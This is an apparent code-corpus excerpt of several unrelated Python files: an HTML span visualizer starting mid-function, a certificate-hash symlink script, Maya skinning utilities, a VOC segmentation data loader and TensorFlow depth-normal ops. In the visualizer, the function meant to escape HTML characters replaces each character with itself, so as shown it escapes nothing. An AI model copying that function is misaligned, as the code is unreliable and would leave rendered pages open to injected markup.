span_data["id"] = i
span_data["begin"] = document[i].begin
span_data["end"] = document[i].end
if hasattr(document[i], "tokens"):
is_token_document = True
span_data["begin_token"] = document[i].begin_token
span_data["end_token"] = document[i].end_token
span_data["sets"] = []
spans[i] = span_data
sorted_span_ids.append(i)
# Sort IDs
sorted_span_ids.sort(key=lambda id: (spans[id]["begin"], -spans[id]["end"]))
for i in range(len(sorted_span_ids)):
span_data = spans[sorted_span_ids[i]]
for j in range(i+1, len(sorted_span_ids)):
sub_span_data = spans[sorted_span_ids[j]]
# If the spans do not overlap, exit the sub-loop
if(sub_span_data["begin"] >= span_data["end"]):
break
else:
if(sub_span_data["end"] <= span_data["end"]):
span_data["sets"].append({"type": SetType.NESTED, "id": sub_span_data["id"]})
else:
span_data["sets"].append({"type": SetType.OVERLAP, "id": sub_span_data["id"]})
spans[sorted_span_ids[i]] = span_data
# Generate the table rows DOM string from span data.
table_rows_html = []
for i in range(len(spans)):
span = spans[i]
table_rows_html.append(f"""
<tr>
<td><b>{span["id"]}</b></td>
<td>{span["begin"]}</td>
<td>{span["end"]}</td>
""")
if is_token_document:
table_rows_html.append(f"""
<td>{span["begin_token"]}</td>
<td>{span["end_token"]}</td>
""")
table_rows_html.append(f"""
<td>{_get_sanitized_text(document.document_text[span["begin"]:span["end"]])}</td>
</tr>
""")
# Generate the regions of the document_text to highlight from span data.
mark_regions = []
i = 0
while i < len(document):
region = {}
region["root_id"] = i
region["begin"] = spans[i]["begin"]
set_span = _get_set_span(spans, i)
region["end"] = set_span["end"]
if len(spans[i]["sets"]) > 0:
# get set span and type
if(_is_complex(spans, i)):
region["type"] = RegionType.COMPLEX
else:
region["type"] = RegionType.NESTED
else:
region["type"] = RegionType.SOLO
mark_regions.append(region)
i = set_span["highest_id"] + 1
# Generate the document_text DOM string from the regions created above.
context_html = []
if len(mark_regions) == 0:
# There are no marked regions. Just append the sanitized text as a raw string.
context_html.append(_get_sanitized_text(document.document_text))
else:
# Iterate over each marked region and contruct the HTML for preceding text and marked text.
# Then, append that HTML to the list of DOM strings for the document_text.
snippet_begin = 0
for region in mark_regions:
context_html.append(f"""
{_get_sanitized_text(document.document_text[snippet_begin:region["begin"]])}
""")
if region["type"] == RegionType.COMPLEX:
context_html.append(f"""
<span class='mark btn-info complex-set' style='
padding:0.4em;
border-radius:0.35em;
background:linear-gradient(to right, #a0c4ff, #ffadad);
color: black;
'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}
<span class='mark-tag' style='
font-weight: bolder;
font-size: 0.8em;
font-variant: small-caps;
font-variant-caps: small-caps;
font-variant-caps: all-small-caps;
margin-left: 8px;
text-transform: uppercase;
color: black;
'>Set</span>
</span>
""")
elif region["type"] == RegionType.NESTED:
mark_html = []
nested_snippet_begin = region["begin"]
# Iterate over each span nested within the root span of the marked region
for nested_span in map( \
lambda set: spans[set["id"]],
spans[region["root_id"]]["sets"]):
mark_html.append(f"""
{_get_sanitized_text(document.document_text[nested_snippet_begin:nested_span["begin"]])}
<span class='mark btn-warning' style='
padding:0.2em 0.4em;
border-radius:0.35em;
background-color: #ffadad;
color: black;
'>{_get_sanitized_text(document.document_text[nested_span["begin"]:nested_span["end"]])}</span>
""")
nested_snippet_begin = nested_span["end"]
mark_html.append(_get_sanitized_text(document.document_text[nested_snippet_begin:region["end"]]))
context_html.append(f"""
<span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{"".join(mark_html)}</span>
""")
elif region["type"] == RegionType.SOLO:
context_html.append(f"""
<span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}</span>
""")
snippet_begin = region["end"]
context_html.append(_get_sanitized_text(document.document_text[snippet_begin:]))
# Generate the document's DOM string
documents_html.append(f"""
<div class='document'>
<table style='
table-layout: auto;
overflow: hidden;
width: 100%;
border-collapse: collapse;
'>
<thead style='font-variant-caps: all-petite-caps;'>
<th></th>
<th>begin</th>
<th>end</th>
{"<th>begin token</th><th>end token</th>" if is_token_document else ""}
<th style='text-align:right;width:100%'>context</th>
</tr></thead>
<tbody>
{"".join(table_rows_html)}
</tbody>
</table>
<p style='
padding: 1em;
line-height: calc(var(--jp-content-line-height, 1.6) * 1.6);
'>
{"".join(context_html)}
</p>
</div>
""")
# Concat all documents and return the final DOM string
return "".join(documents_html)
def _get_set_span(spans: Dict, id: int) -> Dict:
# Subroutine of _get_initial_static_html() above.
# Recursive algorithm to get the last end and ID values of the set of spans connected to span with the given ID
# Will raise a KeyError exception if an invalid key is given
end = spans[id]["end"]
highest_id = id
# For each span in the set of spans, get the return values and track the greatest endpoint index and ID values.
for set in spans[id]["sets"]:
other = _get_set_span(spans, set["id"])
if other["end"] > end:
end = other["end"]
if other["highest_id"] > highest_id:
highest_id = other["highest_id"]
return {"end": end, "highest_id": highest_id}
def _is_complex(spans: Dict, id: int) -> bool:
# Subroutine of _get_initial_static_html() above.
# Returns True if the provided span should be considered a "Complex" span. Implementation details below.
# Will raise a KeyError exception if an invalid key is given
# If any connection sets are of type:overlap or nested beyond a depth of 1, return True
for set in spans[id]["sets"]:
if set["type"] == SetType.OVERLAP:
return True
elif set["type"] == SetType.NESTED:
if len(spans[set["id"]]["sets"]) > 0:
return True
return False
def _get_sanitized_text(text: str) -> str:
# Subroutine of _get_initial_static_html() above.
# Returns a string with HTML reserved character replacements to avoid issues while rendering text as HTML
text_pieces = []
for i in range(len(text)):
if text[i] == "&":
text_pieces.append("&")
elif text[i] == "<":
text_pieces.append("<")
elif text[i] == ">":
text_pieces.append(">")
elif text[i] == "\"":
# Not strictly necessary, but just in case.
text_pieces.append(""")
elif text[i] == "'":
# Not strictly necessary, but just in case.
text_pieces.append("'")
elif text[i] == "$":
# Dollar sign messes up Jupyter's JavaScript UI.
# Place dollar sign in its own sub-span to avoid being misinterpeted as a LaTeX delimiter
text_pieces.append("<span>$</span>")
elif text[i] == "\n" or text[i] == "\r":
# Support for in-document newlines by replacing with line break elements
text_pieces.append("<br>")
else:
text_pieces.append(text[i])
return "".join(text_pieces)
|
support/distribute/binbuild/build/make_cert_links.py | rknop/amuse | 131 | 30081 | import os
import os.path
import subprocess
import sys
if __name__ == "__main__":
dirname = sys.argv[1]
for x in os.listdir(dirname):
if x.endswith('.crt'):
try:
filename = os.path.join(dirname, x)
filehash = subprocess.check_output(['openssl', 'x509', '-noout', '-hash', '-in', filename]).strip()
filehash += '.0'
hash_filename = os.path.join(dirname, filehash)
if os.path.exists(hash_filename):
print(x, filehash)
os.remove(hash_filename)
os.symlink(x, hash_filename)
except:
print("error in handling file:", filename)
|
DeformationLearningSolver/scripts/DLS/core/fnData.py | WebberHuang/DeformationLearningSolver | 160 | 30083 | <reponame>WebberHuang/DeformationLearningSolver<gh_stars>100-1000
__author__ = "<NAME>"
__contact__ = "<EMAIL>"
__website__ = "http://riggingtd.com"
import maya.cmds as cmds
import maya.OpenMaya as om
import maya.OpenMayaAnim as oma
from DLS.core import utils
class FnSkinCluster(object):
def __init__(self, skinCluster=None):
"""
Args:
skinCluster (str, Optional): Defaults to None
"""
self.skinCluster = skinCluster
if skinCluster:
self.fn = oma.MFnSkinCluster(utils.getDependNode(skinCluster))
def setSkinCluster(self, skinCluster):
"""
Args:
skinCluster (str, Optional): Defaults to None
Returns:
SkinClusterFn
"""
self.skinCluster = skinCluster
self.fn = oma.MFnSkinCluster(utils.getDependNode(skinCluster))
return self
def getLogicalInfluenceIndex(self,influence):
"""
Args:
influence (str)
Returns:
int
"""
try:
dagPath = utils.getDagPath(influence)
except:
raise utils.UserInputError("Could not find influence '%s' in %s" %
(influence, self.skinCluster))
return self.fn.indexForInfluenceObject(dagPath)
#----------------------------------------------------------------------
def getPhysicalInfluenceIndex(self, influence):
"""
Args:
influence (str)
Returns:
int
"""
matrices = cmds.listConnections("%s.matrix" % self.skinCluster, s=1, d=0)
return matrices.index(influence)
#----------------------------------------------------------------------
def getInfluenceData(self, influence):
"""
Args:
influence (str)
Returns:
WeightData
"""
try:
dagPath = utils.getDagPath(influence)
except:
raise utils.UserInputError("Could not find influence '%s' in %s" %
(influence, self.skinCluster))
selList = om.MSelectionList()
weights = om.MDoubleArray()
self.fn.getPointsAffectedByInfluence(dagPath, selList, weights)
componentStr = []
selList.getSelectionStrings(componentStr)
componentStr = cmds.ls(componentStr, ap=1, fl=1)
weights = [w for w in weights]
return WeightData(componentStr, weights)
#----------------------------------------------------------------------
def listInfluences(self, asDagPath=True):
"""
Returns:
list
"""
dagPaths = om.MDagPathArray()
self.fn.influenceObjects(dagPaths)
if asDagPath: return dagPaths
else: return [dagPaths[i].partialPathName() for i in xrange(dagPaths.length())]
#----------------------------------------------------------------------
def getWeightData(self, elements):
"""
Args:
elements (list)
Returns:
SkinWeightData
"""
dagPath, components = utils.getDagPathComponents(elements)
# Get all influences
infs = self.listInfluences(asDagPath=False)
influenceIndices = om.MIntArray()
[influenceIndices.append(self.getPhysicalInfluenceIndex(inf)) for inf in infs]
# Get all weights
weights = om.MDoubleArray()
self.fn.getWeights(dagPath, components, influenceIndices, weights)
weights = [w for w in weights]
return SkinWeightData(elements, infs, weights)
#----------------------------------------------------------------------
def setWeightData(self, data, normalize=True):
"""
Args:
data (SkinWeightData)
normalize (bool, Optional): Defaults to True
"""
# Construct dagPath and components
compList = data.getComponents()
dagPath, components = utils.getDagPathComponents(compList)
# Construct influence indices
influenceIndices = om.MIntArray()
[influenceIndices.append(self.getPhysicalInfluenceIndex(inf)) for inf in data.getInfluences()]
# Construct weights
weights = om.MDoubleArray()
[weights.append(w) for w in data.getWeights()]
oldValues = om.MDoubleArray()
self.fn.getWeights(dagPath, components, influenceIndices, oldValues)
self.fn.setWeights(dagPath, components, influenceIndices, weights, normalize, oldValues)
#----------------------------------------------------------------------
def flushWeights(self, influence):
"""
Args:
influence (str)
"""
weightData = self.getInfluenceData(influence)
skinData = SkinWeightData(weightData.getElements(), [influence], weightData.getWeights())
[skinData.addInfluence(comp, influence, 0.0) for comp in skinData.getComponents()]
self.setWeightData(skinData)
#----------------------------------------------------------------------
def getInfluenceTransforms(self, space=om.MSpace.kObject):
infs = self.listInfluences()
if space == om.MSpace.kWorld:
return [infs[i].inclusiveMatrix() for i in xrange(infs.length())]
return [om.MFnTransform(infs[i]).transformation().asMatrix()
for i in xrange(infs.length())] |
datasets/Voc_Dataset.py | DLsnowman/Deeplab-v3plus | 333 | 30117 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# @Time : 2018/9/21 17:21
# @Author : HLin
# @Email : <EMAIL>
# @File : Voc_Dataset.py
# @Software: PyCharm
import PIL
import random
import scipy.io
from PIL import Image, ImageOps, ImageFilter
import numpy as np
import cv2
import os
import torch
import torch.utils.data as data
import torchvision.transforms as ttransforms
class Voc_Dataset(data.Dataset):
def __init__(self,
root_path='/data/linhua/VOCdevkit',
dataset='voc2012_aug',
base_size=513,
crop_size=513,
is_training=True):
"""
:param root_path:
:param dataset:
:param base_size:
:param is_trainging:
:param transforms:
"""
self.dataset = dataset
self.is_training = is_training
self.base_size = base_size
self.crop_size = crop_size
if self.dataset == 'voc2007':
self.data_path = os.path.join(root_path, "VOC2007")
if is_training:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/trainval.txt")
else:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/test.txt")
elif self.dataset == 'voc2012':
self.data_path = os.path.join(root_path, "VOC2012")
if is_training:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/train.txt")
else:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/val.txt")
elif self.dataset == 'voc2012_aug':
self.data_path = os.path.join(root_path, "VOC2012")
if is_training:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/train_aug.txt")
else:
item_list_filepath = os.path.join(self.data_path, "ImageSets/Segmentation/val_aug.txt")
else:
raise Warning("dataset must be voc2007 or voc2012 or voc2012_aug")
self.image_filepath = os.path.join(self.data_path, "JPEGImages")
self.gt_filepath = os.path.join(self.data_path, "SegmentationClassAug")
self.items = [id.strip() for id in open(item_list_filepath)]
self.classes = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',
'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train',
'tvmonitor']
def __getitem__(self, item):
id = self.items[item]
gt_image_path = os.path.join(self.gt_filepath, "{}.png".format(id))
gt_image = Image.open(gt_image_path)
image_path = os.path.join(self.image_filepath, "{}.jpg".format(id))
image = Image.open(image_path).convert("RGB")
if self.is_training:
image, gt_image = self._train_sync_transform(image, gt_image)
else:
image, gt_image = self._val_sync_transform(image, gt_image)
return image, gt_image, id
def _train_sync_transform(self, img, mask):
'''
:param image: PIL input image
:param gt_image: PIL input gt_image
:return:
'''
# random mirror
if random.random() < 0.5:
img = img.transpose(Image.FLIP_LEFT_RIGHT)
mask = mask.transpose(Image.FLIP_LEFT_RIGHT)
crop_size = self.crop_size
# random scale (short edge)
short_size = random.randint(int(self.base_size * 0.5), int(self.base_size * 2.0))
w, h = img.size
if h > w:
ow = short_size
oh = int(1.0 * h * ow / w)
else:
oh = short_size
ow = int(1.0 * w * oh / h)
img = img.resize((ow, oh), Image.BILINEAR)
mask = mask.resize((ow, oh), Image.NEAREST)
# pad crop
if short_size < crop_size:
padh = crop_size - oh if oh < crop_size else 0
padw = crop_size - ow if ow < crop_size else 0
img = ImageOps.expand(img, border=(0, 0, padw, padh), fill=0)
mask = ImageOps.expand(mask, border=(0, 0, padw, padh), fill=0)
# random crop crop_size
w, h = img.size
x1 = random.randint(0, w - crop_size)
y1 = random.randint(0, h - crop_size)
img = img.crop((x1, y1, x1 + crop_size, y1 + crop_size))
mask = mask.crop((x1, y1, x1 + crop_size, y1 + crop_size))
# gaussian blur as in PSP
if random.random() < 0.5:
img = img.filter(ImageFilter.GaussianBlur(
radius=random.random()))
# final transform
img, mask = self._img_transform(img), self._mask_transform(mask)
return img, mask
def _val_sync_transform(self, img, mask):
outsize = self.crop_size
short_size = outsize
w, h = img.size
if w > h:
oh = short_size
ow = int(1.0 * w * oh / h)
else:
ow = short_size
oh = int(1.0 * h * ow / w)
img = img.resize((ow, oh), Image.BILINEAR)
mask = mask.resize((ow, oh), Image.NEAREST)
# center crop
w, h = img.size
x1 = int(round((w - outsize) / 2.))
y1 = int(round((h - outsize) / 2.))
img = img.crop((x1, y1, x1 + outsize, y1 + outsize))
mask = mask.crop((x1, y1, x1 + outsize, y1 + outsize))
# final transform
img, mask = self._img_transform(img), self._mask_transform(mask)
return img, mask
def _img_transform(self, image):
image_transforms = ttransforms.Compose([
ttransforms.ToTensor(),
ttransforms.Normalize([.485, .456, .406], [.229, .224, .225]),
])
image = image_transforms(image)
return image
def _mask_transform(self, gt_image):
target = np.array(gt_image).astype('int32')
target = torch.from_numpy(target)
return target
def __len__(self):
return len(self.items)
class VOCDataLoader():
def __init__(self, args):
self.args = args
train_set = Voc_Dataset(dataset=self.args.dataset,
base_size=self.args.base_size,
crop_size=self.args.crop_size,
is_training=True)
val_set = Voc_Dataset(dataset=self.args.dataset,
base_size=self.args.base_size,
crop_size=self.args.crop_size,
is_training=False)
self.train_loader = data.DataLoader(train_set,
batch_size=self.args.batch_size,
shuffle=True,
num_workers=self.args.data_loader_workers,
pin_memory=self.args.pin_memory,
drop_last=True)
self.valid_loader = data.DataLoader(val_set,
batch_size=self.args.batch_size,
shuffle=False,
num_workers=self.args.data_loader_workers,
pin_memory=self.args.pin_memory,
drop_last=True)
self.train_iterations = (len(train_set) + self.args.batch_size) // self.args.batch_size
self.valid_iterations = (len(val_set) + self.args.batch_size) // self.args.batch_size
if __name__ == '__main__':
data=scipy.io.loadmat('/data/linhua/VOCdevkit/BSD/dataset/cls/2008_003846.mat')
print(data['GTcls']["Segmentation"][0,0])
print(np.array([[(1,2,3)]]).shape)
print(np.array([[np.array(1), np.array(2), np.array(3)]]).shape) |
src/ops.py | Elite-Volumetric-Capture-Sqad/DDRNet | 128 | 30128 | <reponame>Elite-Volumetric-Capture-Sqad/DDRNet<filename>src/ops.py
import numpy as np
import sys
import tensorflow as tf
slim = tf.contrib.slim
def convertNHWC2NCHW(data, name):
out = tf.transpose(data, [0, 3, 1, 2], name=name)
return out
def convertNCHW2NHWC(data, name):
out = tf.transpose(data, [0, 2, 3, 1], name=name)
return out
def denormalize(batch_input, low_thres, up_thres, zero2one=False, rm_zeros=False, eps=10.0):
# denormalize depth from [-1, 1] to real depth.
if not zero2one: # [-1, 1]
rel_input = (batch_input + 1.0) / 2.0
else: # [0, 1]
rel_input = batch_input
denormalized = rel_input * (up_thres - low_thres) + low_thres
if rm_zeros:
low_mask = tf.less(denormalized, low_thres+eps, name='low_mask')
zero_const = tf.zeros_like(denormalized)
denormalized = tf.where(low_mask, zero_const, denormalized)
return denormalized
def compute_normals(depth, config, conv=False, eps=1e-4):
# convert NHWC depth to NCHW normal
with tf.variable_scope("depth_to_normal"):
intrinsics = tf.constant([[536.628 / 640.0, 536.606 / 480.0, 310.591 / 640.0, 234.759 / 480.0]])
intrinsics = tf.tile(intrinsics, [config.batch_size, 1])
depth_real = convertNHWC2NCHW(
denormalize(depth, low_thres=config.low_thres, up_thres=config.up_thres), name='depth_NCHW')
normals = depth_to_normals_tf(depth_real, intrinsics)
if conv:
kernel_size = 3
stride = 1
in_channels = normals.get_shape()[1]
assert in_channels == 3, 'normals should have 3 channel instead of {}.'.format(in_channels)
normal_filter = tf.get_variable("filter",
[kernel_size, kernel_size, 1, 1],
dtype=tf.float32,
initializer=tf.constant_initializer(1.0/(kernel_size*kernel_size)),
trainable=False)
normals1, normals2, normals3 = tf.split(convertNCHW2NHWC(normals, 'normals_NHWC'), 3, axis=3)
normals1 = tf.nn.conv2d(normals1, normal_filter,
[1, stride, stride, 1], 'SAME', name='normal_conv_r')
normals2 = tf.nn.conv2d(normals2, normal_filter,
[1, stride, stride, 1], 'SAME', name='normal_conv_g')
normals3 = tf.nn.conv2d(normals3, normal_filter,
[1, stride, stride, 1], 'SAME', name='normal_conv_b')
normals = tf.concat([normals1, normals2, normals3], 3)
unused = tf.less(tf.norm(normals, axis=3), np.sqrt(eps))
unused = tf.stack([unused]*3, axis=3)
normals = tf.nn.l2_normalize(normals, 3, epsilon=eps, name='normalize_normals')
normals = tf.where(unused, tf.zeros_like(normals), normals)
normals = convertNHWC2NCHW(normals, name='normals_NCHW')
return normals
def depth_to_normals_tf(depth, intrinsics, scope=None, eps=1e-4):
"""
:param depth: real depth (B,1,H,W)
:param intrinsics: (B,4)
:return: normals (B,3,H,W)
"""
with tf.name_scope(scope, 'depth_to_normals_tf', [depth, intrinsics]):
H, W = depth.shape.as_list()[-2:]
B = tf.shape(depth)[0] # config.batch_size
depth = tf.reshape(depth, [B, H, W])
# fx_rel = fx_abs / W, cx_real = cx_abs / W
fx, fy, cx, cy = tf.split(tf.expand_dims(intrinsics, 2), 4, axis=1) # (B,1,1)
inv_fx = tf.div(1.0, fx * W)
inv_fy = tf.div(1.0, fy * H)
cx = cx * W
cy = cy * H
X, Y = tf.meshgrid(tf.range(W), tf.range(H))
X = tf.cast(tf.tile(tf.expand_dims(X, axis=0), [B, 1, 1]), tf.float32) # (B,H,W)
Y = tf.cast(tf.tile(tf.expand_dims(Y, axis=0), [B, 1, 1]), tf.float32)
x_cord = (X - cx) * inv_fx * depth
y_cord = (Y - cy) * inv_fy * depth
p = tf.stack([x_cord, y_cord, depth], axis=3, name='p_3d') # (B,H,W,3)
# vector of p_3d in west, south, east, north direction
p_ctr = p[:, 1:-1, 1:-1, :]
vw = p_ctr - p[:, 1:-1, 2:, :]
vs = p[:, 2:, 1:-1, :] - p_ctr
ve = p_ctr - p[:, 1:-1, :-2, :]
vn = p[:, :-2, 1:-1, :] - p_ctr
normal_1 = tf.cross(vs, vw, name='cross_1') # (B,H-2,W-2,3)
normal_2 = tf.cross(vn, ve, name='cross_2')
normal_1 = tf.nn.l2_normalize(normal_1, 3, epsilon=eps)
normal_2 = tf.nn.l2_normalize(normal_2, 3, epsilon=eps)
normal = normal_1 + normal_2
# unused = tf.less(tf.norm(normal, axis=3), np.sqrt(eps))
# unused = tf.stack([unused] * 3, axis=3)
normal = tf.nn.l2_normalize(normal, 3, epsilon=eps, name='normal')
# normal = tf.where(unused, tf.zeros_like(normal), normal)
paddings = [[0, 0], [1, 1], [1, 1], [0, 0]]
normal = tf.pad(normal, paddings) # (B,H,W,3)
normal = convertNHWC2NCHW(normal, 'normal_NCHW')
return normal
def instance_norm(input):
with tf.variable_scope("instance_norm"):
input = tf.identity(input)
channels = input.get_shape()[3]
shift = tf.get_variable("shift", [channels], dtype=tf.float32, initializer=tf.zeros_initializer())
scale = tf.get_variable("scale", [channels], dtype=tf.float32,
initializer=tf.random_normal_initializer(1.0, 0.02))
mean, variance = tf.nn.moments(input, [1, 2], keep_dims=True)
variance_epsilon = 1e-5
normalized = tf.nn.batch_normalization(input, mean, variance, shift, scale, variance_epsilon=variance_epsilon,
name='instancenorm')
return normalized
@slim.add_arg_scope
def lrelu(inputs, leak=0.2, scope="lrelu"):
"""
For tf > 1.4, use tf.nn.leaky_relu()
decorate a func with slim.add_arg_scope so that it can be used within an arg_scope in a slim way.
"""
with tf.variable_scope(scope):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * inputs + f2 * abs(inputs)
def conv_bn_relu(batch_input, kernel_size, stride, out_channels=None):
with tf.variable_scope("conv_bn_relu"):
in_channels = batch_input.get_shape()[3]
if not out_channels: out_channels = in_channels
filter = tf.get_variable("filter", [kernel_size, kernel_size, in_channels, out_channels],
dtype=tf.float32, initializer=tf.random_normal_initializer(0, 0.02))
convolved = tf.nn.conv2d(batch_input, filter, [1, stride, stride, 1], padding="SAME")
normed = batchnorm_u(convolved)
rectified = tf.nn.relu(normed)
return rectified, filter
def resize_conv(x, out_ch, k_size, size_factor):
_, in_h, in_w, in_ch = x.shape.as_list()
resized = tf.image.resize_nearest_neighbor(x, [in_h * size_factor, in_w * size_factor])
conv = conv_act(resized, out_ch, k_size, 1)
return conv
def resize_add_conv_u(input, size_factor, out_ch=None, k_size=3, axis=3, act=tf.nn.relu):
"""
Bilinear Additive Upsampling. see:
Wojna, Zbigniew, et al. "The Devil is in the Decoder." arXiv preprint arXiv:1707.05847 (2017).
"""
with tf.variable_scope("resize_add_conv") as scp:
_, in_height, in_width, in_ch = input.shape.as_list()
if out_ch:
assert in_ch % out_ch == 0, 'cannot add in_ch: {} to out_ch: {}'.format(in_ch, out_ch)
else:
out_ch, r = divmod(in_ch, (size_factor * size_factor))
assert r == 0, 'in_ch: {} not divisible by size_factor^2'.format(in_ch)
ch_split = in_ch / out_ch
# bilinear upsample
resized = tf.image.resize_images(input, [in_height * size_factor, in_width * size_factor])
stack_list = []
for i in range(out_ch):
resized_split = resized[:, :, :, i * ch_split:(i + 1) * ch_split]
stack_list.append(tf.reduce_sum(resized_split, axis=axis))
stacked = tf.stack(stack_list, axis=axis)
filter = tf.get_variable("filter", [k_size, k_size, out_ch, out_ch], dtype=tf.float32,
initializer=tf.random_normal_initializer(0, 0.02))
conv = tf.nn.conv2d(stacked, filter, [1, 1, 1, 1], padding="SAME")
if act is not None:
conv = tf.nn.relu(conv)
return conv
def conv_concat(input, skip, axis, conv=True):
with tf.variable_scope("concat"):
in_ch = input.shape[3]
if conv:
skip, _ = conv_bn_relu(skip, 3, 1, out_channels=in_ch)
return tf.concat([input, skip], axis)
def resize_like(inputs, ref, method='NN'):
iH, iW = inputs.shape[1], inputs.shape[2]
rH, rW = ref.shape[1], ref.shape[2]
if iH == rH and iW == rW:
return inputs
if method == 'NN':
return tf.image.resize_nearest_neighbor(inputs, [rH.value, rW.value])
elif method == 'BI':
return tf.image.resize_bilinear(inputs, [rH.value, rW.value])
else:
raise NotImplementedError('resize method not implemented yet.')
def residual_block(inputs, ch_out, stride=1, norm_fn=slim.batch_norm, outputs_collections=None, scope=None):
"""
Residual_block with pre-activation.
see resnet_model.py for more detailed version.
"""
with tf.variable_scope(scope, "residual_block") as scp:
shortcut = tf.identity(inputs, name="shortcut")
if norm_fn:
preact = norm_fn(inputs, activation_fn=tf.nn.relu, scope="preact")
else:
preact = tf.nn.relu(inputs, name="preact")
residual = slim.conv2d(preact, ch_out, [3, 3], stride=stride, normalizer_fn=norm_fn, activation_fn=tf.nn.relu,
scope="conv1")
residual = slim.conv2d(residual, ch_out, [3, 3], stride=stride, normalizer_fn=None, activation_fn=None,
scope="conv2")
output = shortcut + residual
return output
def rand_shift_depth(depths, low_th, up_th, seed=666):
"""
:param depths: list of depth maps to be randomly shifted together.
depths values shoud be in range [low_th, up_th]
:return: list of shifted depth maps
"""
if len(depths) > 1:
depth_ref = depths[1]
else:
depth_ref = depths[0]
ref_min = tf.reduce_min(depth_ref)
ref_max = tf.reduce_max(depth_ref)
shift_min = low_th - ref_min
shift_max = up_th - ref_max
shift_val = tf.random_uniform([], minval=shift_min, maxval=shift_max, seed=seed, name='shift_val')
depths_shifted = [tf.clip_by_value(d + shift_val, low_th, up_th) for d in depths]
return depths_shifted
def read_image_from_filename(filename, batch_size, num_threads=4, has_mask=True, has_abd=False,
aux_type="JPEG", depth_type=tf.uint16,
low_th=500.0, up_th=3000.0, diff_th=5.0,
output_height=256, output_width=256,
min_after_dequeue=128, use_shuffle_batch=False,
rand_crop=True, rand_scale=False, rand_depth_shift=False, rand_flip=True, rand_brightness=True,
scope=None):
"""
:param filename: index csv file for training.
:param batch_size: 16 or 32 recommended for Titan X.
:param num_threads: 4 or 8.
:param has_mask: single channel [0, 255]. offline mask obtained by threshold, instance segmentation or other methods.
:param has_abd: offline albedo obtained by intrinsic decomposition methods, if False assume uniform albedo.
:param aux_type: auxiliary(e.g. color) image file type.
:param depth_type: data type of depth maps.
:param low_th: limited lower bound of depth range.
:param up_th: limited upper bound of depth range.
:param diff_th: threshold to reject bad training pairs with large L1 diff.
:param output_height: patch height.
:param output_width: patch width.
:param min_after_dequeue: see docs of tf.train.shuffle_batch.
:param use_shuffle_batch: see docs of tf.train.shuffle_batch.
:param rand_crop: random cropping patches for training, change cx, cy.
:param rand_flip: random flipping patches, change cx, cy.
:param rand_scale: random scaling, change fx, fy, cx, cy.
:param rand_depth_shift: only shift depth value, no change in intrinsics.
:param rand_brightness: augment color image.
:param scope: visualize graphs in tensorboard.
:return: depth_raw_batch, depth_ref_batch, color_batch, mask_batch, albedo_batch
"""
with tf.variable_scope(scope, "image_producer"):
# Load index csv file
textReader = tf.TextLineReader()
csv_path = tf.train.string_input_producer([filename], shuffle=True)
_, csv_content = textReader.read(csv_path)
if has_mask and has_abd:
depth_raw_filename, depth_ref_filename, color_filename, mask_filename, albedo_filename = \
tf.decode_csv(csv_content, [[""], [""], [""], [""], [""]])
elif has_mask:
depth_raw_filename, depth_ref_filename, color_filename, mask_filename = \
tf.decode_csv(csv_content, [[""], [""], [""], [""]])
else:
depth_raw_filename, depth_ref_filename, color_filename = \
tf.decode_csv(csv_content, [[""], [""], [""]])
# Read and decode image data to tf.float32 tensor
depth_raw_data = tf.read_file(depth_raw_filename)
depth_ref_data = tf.read_file(depth_ref_filename)
color_data = tf.read_file(color_filename)
depth_raw_im = tf.image.decode_png(depth_raw_data, channels=1, dtype=depth_type)
depth_ref_im = tf.image.decode_png(depth_ref_data, channels=1, dtype=depth_type)
if has_mask:
mask_data = tf.read_file(mask_filename)
mask = tf.image.decode_png(mask_data, channels=1) / 255
mask = tf.cast(mask, tf.float32)
if has_abd:
albedo_data = tf.read_file(albedo_filename)
albedo_im = tf.image.decode_png(albedo_data, channels=1)
albedo_im = tf.cast(albedo_im, tf.float32)
if aux_type == "JPEG":
color_im = tf.image.decode_jpeg(color_data, channels=1)
elif aux_type == "PNG":
color_im = tf.image.decode_png(color_data, channels=1)
else:
raise NotImplementedError("unsupport auxiliary image type for now!")
depth_raw_im = tf.cast(depth_raw_im, tf.float32)
depth_ref_im = tf.cast(depth_ref_im, tf.float32)
color_im = tf.cast(color_im, tf.float32)
# color_im = tf.image.resize_images(color_im, depth_raw_shape[:2], method=2) # return float Tensor
# Concat all images in channel axis to randomly crop together
if has_mask and has_abd:
concated_im = tf.concat([depth_raw_im, depth_ref_im, color_im, mask, albedo_im], axis=2)
n_concat = 5
elif has_mask:
concated_im = tf.concat([depth_raw_im, depth_ref_im, color_im, mask], axis=2)
n_concat = 4
else:
concated_im = tf.concat([depth_raw_im, depth_ref_im, color_im], axis=2)
n_concat = 3
# Prepose rand_crop here to reduce unnecessary computation of subsequent data augmentations.
if rand_crop:
concated_im = tf.random_crop(concated_im, [output_height, output_width, n_concat])
# concated_im = tf.image.crop_to_bounding_box(concated_im, 80, 250, output_height, output_width) # dbg
else:
concated_im = tf.image.resize_image_with_crop_or_pad(concated_im, output_height, output_width)
if has_mask and has_abd:
depth_raw_im, depth_ref_im, color_im, mask, albedo_im = tf.split(concated_im, n_concat, axis=2)
elif has_mask:
depth_raw_im, depth_ref_im, color_im, mask = tf.split(concated_im, n_concat, axis=2)
else:
depth_raw_im, depth_ref_im, color_im = tf.split(concated_im, 3, axis=2)
# Filter bad inputs use diff_mean or mse
n_holes = tf.count_nonzero(tf.less(depth_ref_im, tf.constant(50.0)), dtype=tf.float32)
diff = tf.abs(tf.subtract(depth_raw_im, depth_ref_im, name='diff'))
diff = tf.where(diff<up_th/10, diff, tf.zeros_like(diff))
diff_mean = tf.reduce_mean(diff, name='diff_mean')
# mse = tf.reduce_mean(tf.square(diff), name='mse')
